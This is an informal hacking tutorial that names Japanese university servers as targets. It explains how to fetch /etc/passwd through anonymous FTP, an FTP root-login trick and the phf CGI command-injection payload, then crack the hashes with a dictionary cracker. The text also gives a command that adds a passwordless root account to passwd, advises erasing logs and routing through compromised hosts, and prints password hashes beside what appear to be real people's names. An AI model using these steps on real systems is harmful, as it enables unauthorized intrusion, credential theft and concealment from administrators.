First of all you will need an ftp program such as ws_ftp. use Voyager FTP downloadable athttp://www.windows95.com/ it’s real simple and easy to use, so try it if you haven’t dealt with ftp before. Now once you have the program find an address like http://www.shiga-pc.ac.jp you can find addresses like this by going to a search engine such as AltaVista or Google and running a search for url:ac.jp this tells the search engine to give you all the academic addresses in Japan ex. ac=academic jp=Japan , you can try this with any country ex. url:dk . But for now let’s just focus on the Japanese servers. When u have an address (I would recommend making a list of about 100 and trying them all) go to your ftp program and type in the address ex. http://www.shiga-pc.ac.jp note.. You will have to log in anonymously. You should then get a list of folders on the remote system usr, pub,etc, dev, bin. See the etc folder? open it, once opened you should see some files passwd and group, open or view the file passwd (this is where the passwords for the system are stored), you should hopefully get something
that looks like this:
root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
field:PASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
operator:PASSWORD HERE:0:28:Operator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sys:PASSWORD HERE:2:3:Mr Kernel:/usr/sys:
bin:PASSWORD HERE:3:4:Mr Binary:/bin:
uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
sso:Nologin:6:7:System Security Officer:/etc/security:
news:Nologin:8:8:USENET News System:/usr/spool/netnews:
sccs:PASSWORD HERE:9:10:Source Code Control:/:
ingres:PASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh
rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
jgordon:w4735loqb8F5I:275:15:James.”Tiger” Gordon:/usr/email/users/jgordon:/bin/csh
lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
delliott:8Q1O1LukmfXfA:283:15:Dan Elliott:/usr/email/users/delliott:/bin/csh
erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh
dbrown:fmTUonryY2mCE:295:15:Doris Brown:/usr/email/users/dbrown:/bin/csh
This means you’ve hit the jackpot, in this case you should get a password cracker download one at (http://www.hackersweb.com go to the hacking toolz section), I would recommend for the beginning hacker to get a password cracker such as killer cracker because it’s extremely easy to use. Once you have downloaded killer cracker you will need a dictionary file
(get one at http://www.hackersweb.com look in the extra toolz section), dictionary files are better the bigger they are so I would recommend (Basically this is a brute-forcing software)
getting one at around 10 MB or more. Now the passwords from the passwd file off the server you are hacking, you will need to save them to a file and place them in the same directory as Killer Cracker, you will also need to have your dictionary file in the same directory. Now you are ready to go, just run killer cracker and tell it the name of the Pwfile=the password
file and the name of the word file=your dictionary file, the valid file will be the file where the output of the password cracker will be put just give it a name such as crack.txt. Once the cracker is done cracking the password files for you goto the valid file and take a look the file should look something like this
root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember this is an example). This file says that the username is root
and the password is rootif the file had been like this.
root:dumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember again just an example) the login or username would be root and
the password would be dumbass, well that’s it just ftp to the site using
the login and password. Note if you get root type in the following once
you have logged in:- echo “myserver::0:0:Test User:/:/bin/csh”>>etc\passwd
this will allow you to login to the server with 1:myserver so you
get the admin suspicious when they see people login as root. Hide yourself
as much as possible, if you already have a shell then go through that first
when loggin on, or telnet to the hacked site shell and then re-telnet to the
hacked shell using the hacked shell, if you see what I mean, so your who
appears as local host. Also get some c scripts which delete your presence,
erases you off logs etc.
Now if you were not as lucky to get exactly the same password file as shown
in the example above then maybe you got something like this.
root:*:0:1:Operator:/:
ftp:*:53:53:anonymous ftp:/pub:
t2:*:201:201:Takaoka Tadashi:/pub:
This means that the passwd file is shadowed, if this is the case then
welcome to the administrators world of trying to stop hackers, this is
where you cant really do anything. However there is one thing to do
sometimes in very rare cases there may be a folder on the remote system
that can be accessed by an anonymous login called shadowed, shadow, or
secret if this is the case the password files should be in there,
congratulations. If there isn’t a folder like this, and the passwd file
is shadowed then bad luck, go to the next address on your list.
Now that you have tried the first thing as shown above there are a couple
of other methods you may also want to try one is FTP hacking shown below.
Go to a dos prompt after you are connected to the internet .
Type.
ftp www.victim=the site address
server will ask for a username press enter
server will ask for a password press enter
at the prompt type quote user ftp
then type
quote cwd ~root
then type
quote pass ftp
If you get in make sure you delete the log file they might look at it and
see that you were on. Once you get on the passwd file is in etc/passwd so
type cd etc then type get passwd. If you have done the above right and the
server is old you will have root access. By the way root is the highest
security status you can have.
Another good way of getting root or a shell at least is through browser
hacking. Again well use Japanese educational servers as our target. To do
this you will need a browser such as Netscape or Internet Explorer, you
will also need a telnet program, you can either download a telnet program
at http://www.windows95.com or use the one that already comes with dos.
To access the telnet program that comes with dos go to your dos windows and
type in telnet www.site.com the site.com stand for the site you want to
telnet to, it could be anything like www.geidai.ac.jp or www.tulips.tsukuba.ac.jp. You will also need a cracker program I would recommend using Killer Cracker and applying as above.
Next thing you do is open your browser and run a search for url:ac.jp ,
like explained above. Again I would recommend making a big list of your
targets. Now when you have your targets we address type it in your browser
and add this to it.
http://www.tagetgoeshere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
or
http://www.tagetgoeshere.com/cgi/phf?Qalias=x%0a/bin/cat%20/etc/passwd
To all you out there who are slightly advanced, I know this is the phf
technique and it is virtually dead, but you’ll be surprised where you can
use this.
This technique of finding the password file was first used in November 1996
on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
servers, so this won’t work on something like www.nasa.gov or most of the
www.*.com sites. But still works on many university servers outside Europe
and the U.S.
O.K. Once the url is entered you will see a number of things:-
Error 404
Cgi-bin/phf is not found on this server (the most common one)
Or
Warning
You do not have permission to view cgi-bin/phf?/ on this server
There are a number of other things the server might say, but the thing you
want it to say is this:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:fdn7:3:3:0000-Admin(0000):/:
adm:dehf6:4:4:0000-Admin(0000):/var/adm:
wnn:dfhfnv:5:5:0000-Admin(0000):/var/adm:
news:detdc:6:6:0000-Admin(0000):/usr/lib/news:
lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
smtp:cmvof:0:0:mail daemon user:/:
uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:pelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:eoend:37:4:Network Admin:/usr/net/nls:
nobody:ccvjcvj:60001:60001:uid no b
etc.
This means you have hit the jackpot!!!
If you get something similar to this but all lines have something in common
like the following:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/bin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
wnn:x:5:5:0000-Admin(0000):/var/adm:
news:x:6:6:0000-Admin(0000):/usr/lib/news:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no b
(notice the c) if you don’t know what this means it means the password
file is shadowed and you cannot work out ht epasswords for a shadowed
password file then you’re in bad luck, I would recommend trying the ftp
hack prior to this for the best results.
If some but not all logins have a * in them then it’s ok, it’s worth while
getting the ones which aren’t shadowed, hey a shell is a shell!!!
If you want to use your newly acquired shells then telnet to the site and
put in the login and the password (remember you have to crack the password
file first explained at the top).
